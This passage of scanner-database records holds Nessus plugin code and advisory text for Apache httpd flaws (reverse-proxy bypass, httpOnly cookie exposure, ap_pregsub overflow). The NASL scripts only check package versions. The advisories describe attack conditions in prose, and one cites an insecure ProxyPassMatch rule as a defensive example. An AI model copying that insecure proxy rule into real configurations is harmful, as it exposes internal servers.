reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-14T00:00:00", "type": "nessus", "title": "RHEL 6 : httpd (RHSA-2012:0128)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/nessus/57931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57931);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"RHEL 6 : httpd (RHSA-2012:0128)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1391.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0128\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:58:57", "description": "This update contains the latest stable release of the Apace HTTP Server, version 2.2.22. This release fixes various bugs, and the following security issues :\n\n - Reject requests where the request-URI does not match the HTTP specification, preventing unexpected expansion of target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the mod_setenvif module is enabled, could allow local users to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with ProxyPassMatch or RewriteRule, where particular request-URIs could result in undesired backend network exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format string is in use and a client sends a nameless, valueless cookie, causing a denial of service. The issue existed since version 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged child process could cause the parent to crash at shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose 'httpOnly' cookies when no custom ErrorDocument is specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-03-07T00:00:00", "type": "nessus", "title": "Fedora 15 : httpd-2.2.22-1.fc15 (2012-1642)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-1642.NASL", "href": "https://www.tenable.com/plugins/nessus/58252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-1642.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58252);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51705, 51706);\n script_xref(name:\"FEDORA\", value:\"2012-1642\");\n\n script_name(english:\"Fedora 15 : httpd-2.2.22-1.fc15 (2012-1642)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains the latest stable release of the Apace HTTP\nServer, version 2.2.22. This release fixes various bugs, and the\nfollowing security issues :\n\n - Reject requests where the request-URI does not match the\n HTTP specification, preventing unexpected expansion of\n target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the\n mod_setenvif module is enabled, could allow local users\n to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with\n ProxyPassMatch or RewriteRule, where particular\n request-URIs could result in undesired backend network\n exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the\n '%{cookiename}C' log format string is in use and a\n client sends a nameless, valueless cookie, causing a\n denial of service. The issue existed since version\n 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged\n child process could cause the parent to crash at\n shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose\n 'httpOnly' cookies when no custom ErrorDocument is\n specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/CHANGES_2.2.22\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=785070\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=787325\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-March/074371.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1200a082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"httpd-2.2.22-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:38:45", "description": "This update contains the latest stable release of the Apace HTTP Server, version 2.2.22. This release fixes various bugs, and the following security issues :\n\n - Reject requests where the request-URI does not match the HTTP specification, preventing unexpected expansion of target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the mod_setenvif module is enabled, could allow local users to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with ProxyPassMatch or RewriteRule, where particular request-URIs could result in undesired backend network exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format string is in use and a client sends a nameless, valueless cookie, causing a denial of service. The issue existed since version 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged child process could cause the parent to crash at shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose 'httpOnly' cookies when no custom ErrorDocument is specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-21T00:00:00", "type": "nessus", "title": "Fedora 16 : httpd-2.2.22-1.fc16 (2012-1598)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-1598.NASL", "href": "https://www.tenable.com/plugins/nessus/58050", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-1598.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58050);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 51407, 51705, 51706);\n script_xref(name:\"FEDORA\", value:\"2012-1598\");\n\n script_name(english:\"Fedora 16 : httpd-2.2.22-1.fc16 (2012-1598)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains the latest stable release of the Apace HTTP\nServer, version 2.2.22. This release fixes various bugs, and the\nfollowing security issues :\n\n - Reject requests where the request-URI does not match the\n HTTP specification, preventing unexpected expansion of\n target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the\n mod_setenvif module is enabled, could allow local users\n to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with\n ProxyPassMatch or RewriteRule, where particular\n request-URIs could result in undesired backend network\n exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the\n '%{cookiename}C' log format string is in use and a\n client sends a nameless, valueless cookie, causing a\n denial of service. The issue existed since version\n 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged\n child process could cause the parent to crash at\n shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose\n 'httpOnly' cookies when no custom ErrorDocument is\n specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/CHANGES_2.2.22\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=785070\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-February/073489.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec1cc0a9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"httpd-2.2.22-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:01", "description": "Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local attackers to execute arbitrary code at elevated privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the request URI for proxied requests. In certain reverse proxy configurations using the ProxyPassMatch directive or using the RewriteRule directive with the [P] flag, a remote attacker could make the proxy connect to an arbitrary server. This could allow the attacker to access internal servers that are not otherwise accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same issue.\n\n Note that, even with this issue fixed, it is the responsibility of the administrator to ensure that the regular expression replacement pattern for the target URI does not allow a client to append arbitrary strings to the host or port parts of the target URI. For example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process to crash during shutdown. This is a violation of the privilege separation between the apache2 processes and could potentially be used to worsen the impact of other vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request) could be used to expose 'httpOnly' cookies. This could allow a remote attacker using cross site scripting to steal authentication cookies.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-07T00:00:00", "type": "nessus", "title": "Debian DSA-2405-1 : apache2 - multiple issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2405.NASL", "href": "https://www.tenable.com/plugins/nessus/57851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2405. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57851);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51706);\n script_xref(name:\"DSA\", value:\"2405\");\n\n script_name(english:\"Debian DSA-2405-1 : apache2 - multiple issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local\n attackers to execute arbitrary code at elevated\n privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain reverse\n proxy configurations using the ProxyPassMatch directive\n or using the RewriteRule directive with the [P] flag, a\n remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to\n access internal servers that are not otherwise\n accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append\n arbitrary strings to the host or port parts of the target URI. For\n example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations :\n\n 